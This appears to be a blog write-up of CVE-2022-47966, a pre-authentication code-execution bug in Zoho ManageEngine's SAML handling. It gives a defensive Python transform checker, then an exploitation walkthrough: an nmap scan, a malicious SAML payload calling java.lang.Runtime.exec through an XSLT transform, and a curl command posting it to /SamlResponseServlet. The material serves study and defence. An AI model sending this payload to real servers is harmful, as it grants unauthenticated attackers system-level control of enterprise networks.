CVE-2022-47966 - Remote Code Execution in Zoho ManageEngine via Apache XMLSec Vulnerability
In January 2023, public research and proof-of-concept code brought wide attention to CVE-2022-47966, a critical bug Zoho had patched across multiple ManageEngine on-premise products, including ServiceDesk Plus up to build 14003. The bug lets an unauthenticated attacker run code on the target server, potentially compromising the entire network. In this post we break down what CVE-2022-47966 is, how it works, share code samples for detection and exploitation, and link to trusted references.
What Is CVE-2022-47966?
CVE-2022-47966 is a pre-authentication Remote Code Execution (RCE) vulnerability. It exists because Zoho's ManageEngine products bundled xmlsec 1.4.1 (Apache XML Security for Java, the Apache Santuario project), a release well over a decade old that still honoured XSLT transforms inside XML Signatures and predates the library's secure-validation mode that later versions use to refuse them. That version left it to the calling application to restrict which transforms a signature may use.
Zoho's applications did not add that restriction, leaving the door open to attackers.
The list of affected products is long; always check the latest Zoho advisory for the complete, up-to-date list and the fixed build for each product.
Reference Links
- Zoho Security Advisory
- NIST NVD Entry
- Rapid7 Analysis
Details: Why Does This Vulnerability Exist?
The heart of the problem is that xmlsec 1.4.1 implements the XSLT transform of the XML Signature specification: a ds:Transform inside a ds:Reference may carry an entire attacker-supplied stylesheet, and the library applies it while computing the reference digest, which happens before the signature itself is verified. The stylesheet runs on Xalan, whose Java extension functions let XPath expressions call arbitrary Java classes such as java.lang.Runtime, so a transform turns into operating-system command execution. If the application does not reject such transforms up front, the signature check offers no protection because the code has already run by the time it fails.
This bug matters when SAML Single Sign-On (SSO) is reachable: per Zoho's advisory, some products are exploitable only while SAML SSO is enabled, others if it was ever enabled, because the SAML response endpoint remains exposed.
Library in question: xmlsec v1.4.1 (Apache XML Security for Java, also known as Apache Santuario)
- Feature misused: XSLT Transforms in ds:Signature (runs an attacker-controlled stylesheet, with Xalan Java extensions, during signature reference processing)
- Protections missing: the application must reject or allowlist transform algorithms before processing the signature; Zoho's software did not do so before the fixed builds (ServiceDesk Plus 14004).
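As an added example (not code from this post, from Zoho, or from Apache Santuario), here is the pre-verification check the vulnerable applications lacked, written in Python: it walks every ds:Reference in a SAML response, refuses the XSLT transform outright, and allowlists the handful of transforms a SAML assertion signature legitimately needs. The allowlist and the per-reference cap are this example's own assumptions, modelled on the idea behind Santuario's later secure-validation mode; the two sample responses are constructed for the demo and carry placeholder digest and signature values.

```python
import base64
import xml.etree.ElementTree as ET

DS_NS = "http://www.w3.org/2000/09/xmldsig#"
XSLT_TRANSFORM = "http://www.w3.org/TR/1999/REC-xslt-19991116"

# Transforms a SAML assertion signature legitimately needs. Anything else is refused.
# This allowlist is the example's own choice (assumption), not copied from Zoho's fix.
ALLOWED_TRANSFORMS = {
    "http://www.w3.org/2000/09/xmldsig#enveloped-signature",
    "http://www.w3.org/TR/2001/REC-xml-c14n-20010315",
    "http://www.w3.org/TR/2001/REC-xml-c14n-20010315#WithComments",
    "http://www.w3.org/2001/10/xml-exc-c14n#",
    "http://www.w3.org/2001/10/xml-exc-c14n#WithComments",
}
MAX_TRANSFORMS_PER_REFERENCE = 5  # assumption: a sane cap, more is a sign of abuse


def find_unsafe_transforms(xml_bytes: bytes) -> list:
    """Return (reference_uri, algorithm, reason) for every transform that must
    block signature processing. This runs BEFORE any digest or signature check,
    which is the ordering xmlsec 1.4.1 got wrong: it executed the transform
    first and only afterwards verified the signature."""
    # expat does not fetch external entities; still bound the input size upstream.
    root = ET.fromstring(xml_bytes)
    findings = []
    for ref in root.iter(f"{{{DS_NS}}}Reference"):
        uri = ref.get("URI", "")
        transforms = list(ref.iter(f"{{{DS_NS}}}Transform"))
        if len(transforms) > MAX_TRANSFORMS_PER_REFERENCE:
            findings.append((uri, None, f"{len(transforms)} transforms exceed cap"))
        for t in transforms:
            alg = t.get("Algorithm", "")
            if alg == XSLT_TRANSFORM:
                findings.append((uri, alg, "XSLT transform carries an attacker-supplied stylesheet"))
            elif alg not in ALLOWED_TRANSFORMS:
                findings.append((uri, alg, "transform algorithm not in allowlist"))
    return findings


def encode_for_post(xml_bytes: bytes) -> str:
    """The HTTP-POST binding sends the XML base64-encoded in the SAMLResponse field."""
    return base64.b64encode(xml_bytes).decode("ascii")


def check_saml_response(form_value: str) -> list:
    """Entry point for a SAMLResponse form value: decode, then inspect transforms."""
    return find_unsafe_transforms(base64.b64decode(form_value))


# Constructed sample: the transforms a normal IdP emits.
BENIGN_RESPONSE = b"""<samlp:Response xmlns:samlp="urn:oasis:names:tc:SAML:2.0:protocol"
    xmlns:saml="urn:oasis:names:tc:SAML:2.0:assertion"
    xmlns:ds="http://www.w3.org/2000/09/xmldsig#" ID="_r1">
  <saml:Assertion ID="_a1">
    <ds:Signature><ds:SignedInfo>
      <ds:Reference URI="#_a1">
        <ds:Transforms>
          <ds:Transform Algorithm="http://www.w3.org/2000/09/xmldsig#enveloped-signature"/>
          <ds:Transform Algorithm="http://www.w3.org/2001/10/xml-exc-c14n#"/>
        </ds:Transforms>
        <ds:DigestValue>AAAA</ds:DigestValue>
      </ds:Reference>
    </ds:SignedInfo><ds:SignatureValue>AAAA</ds:SignatureValue></ds:Signature>
  </saml:Assertion>
</samlp:Response>"""

# Constructed sample: the CVE-2022-47966 shape, an XSLT transform reaching
# java.lang.Runtime through Xalan's Java extension namespace.
MALICIOUS_RESPONSE = b"""<samlp:Response xmlns:samlp="urn:oasis:names:tc:SAML:2.0:protocol"
    xmlns:saml="urn:oasis:names:tc:SAML:2.0:assertion"
    xmlns:ds="http://www.w3.org/2000/09/xmldsig#" ID="_r2">
  <saml:Assertion ID="_a2">
    <ds:Signature><ds:SignedInfo>
      <ds:Reference URI="#_a2">
        <ds:Transforms>
          <ds:Transform Algorithm="http://www.w3.org/TR/1999/REC-xslt-19991116">
            <xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
                xmlns:rt="http://xml.apache.org/xalan/java/java.lang.Runtime">
              <xsl:template match="/">
                <xsl:value-of select="rt:exec(rt:getRuntime(), 'calc.exe')"/>
              </xsl:template>
            </xsl:stylesheet>
          </ds:Transform>
        </ds:Transforms>
        <ds:DigestValue>AAAA</ds:DigestValue>
      </ds:Reference>
    </ds:SignedInfo><ds:SignatureValue>AAAA</ds:SignatureValue></ds:Signature>
  </saml:Assertion>
</samlp:Response>"""


if __name__ == "__main__":
    print("benign   :", find_unsafe_transforms(BENIGN_RESPONSE))
    print("malicious:", check_saml_response(encode_for_post(MALICIOUS_RESPONSE)))
```

The point of the ordering is that the check touches only the transform metadata, never evaluates a stylesheet, and rejects the response before any digest is computed; an allowlist is preferred over a denylist of XSLT alone because the same library also honours XPath-based transforms that an application rarely needs.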
1. Detecting an Exposed Service
On a target organization, you might scan for ServiceDesk Plus or another ManageEngine app on its default port (ServiceDesk Plus listens on 8080 by default; HTTPS deployments commonly use 8443):
nmap -p 8080,8443 -sV <target-ip>
Then confirm the SAML code path is reachable. The login page identifies the product, and for ServiceDesk Plus the SAML assertion consumer endpoint is /SamlResponseServlet; that is the handler the crafted response must reach.
2. Sending a Malicious SAML Request
A basic exploitation path is via SAML SSO. Below is a trimmed SAML response carrying an XSLT transform. The stylesheet reaches Java through Xalan's extension-function namespace, so rt:exec(rt:getRuntime(), ...) calls java.lang.Runtime.exec; this one spawns a calculator on Windows, for demonstration only:
<saml:Assertion ...>
<ds:Signature>
<ds:SignedInfo>
<ds:Reference URI="">
<ds:Transforms>
<ds:Transform Algorithm="http://www.w3.org/TR/1999/REC-xslt-19991116">
<xsl:stylesheet version="1.0"
xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
xmlns:rt="http://xml.apache.org/xalan/java/java.lang.Runtime">
<xsl:template match="/">
<xsl:value-of select="rt:exec(rt:getRuntime(), 'calc.exe')" />
</xsl:template>
</xsl:stylesheet>
</ds:Transform>
</ds:Transforms>
</ds:Reference>
</ds:SignedInfo>
...
</ds:Signature>
</saml:Assertion>
> Note: This is a simplified snippet. The response does not need a valid signature: the library applies the transform while processing the reference, before the signature is verified, so the command runs even though verification fails afterwards. It only needs to be well-formed enough to reach the signature-processing code path.
Attackers send it as the SAMLResponse form field of the HTTP-POST binding, base64-encoded; for ServiceDesk Plus the consumer endpoint is /SamlResponseServlet:
curl -k -X POST http://<target-ip>:8080/SamlResponseServlet --data-urlencode "SAMLResponse=$(base64 -w0 malicious_response.xml)"
3. What Happens?
If the product is vulnerable, the server parses the SAML response, applies the XSLT transform while processing the signature reference, and runs the embedded command with the privileges of the account running the ManageEngine service, which on many Windows installs is NT AUTHORITY\SYSTEM. No credentials and no valid signature are needed, so a single request gives an attacker a foothold from which to persist and move laterally across the enterprise network.
Read more on early exploits in Rapid7's report.
Conclusion
CVE-2022-47966 is a classic example of why third-party components and "secure-by-default" settings matter: the dangerous feature lived in a dependency, and nothing in the application turned it off. If you run any Zoho ManageEngine product, patch *today* to the fixed build for each product (ServiceDesk Plus 14004 or later), disable SAML SSO where it is not needed, and review web-server logs for unexpected POSTs to the SAML response endpoint.
More Reading
- ManageEngine Security Advisory (Official)
- NVD Details
- Shadowserver Foundation — Exploit Tracking
Stay safe, and always monitor your third-party libraries!
Timeline
Published on: 01/18/2023 18:15:00 UTC
Last modified on: 02/09/2023 19:15:00 UTC